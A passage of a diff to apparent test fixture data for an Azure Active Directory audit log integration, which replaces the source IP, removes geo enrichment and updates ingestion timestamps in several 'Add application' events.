"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13229,25 +12095,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13261,7 +12109,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13387,7 +12235,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -13399,12 +12247,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036447300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125207800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13430,25 +12278,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13462,7 +12292,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13588,7 +12418,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -13600,12 +12430,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036451600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125212900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 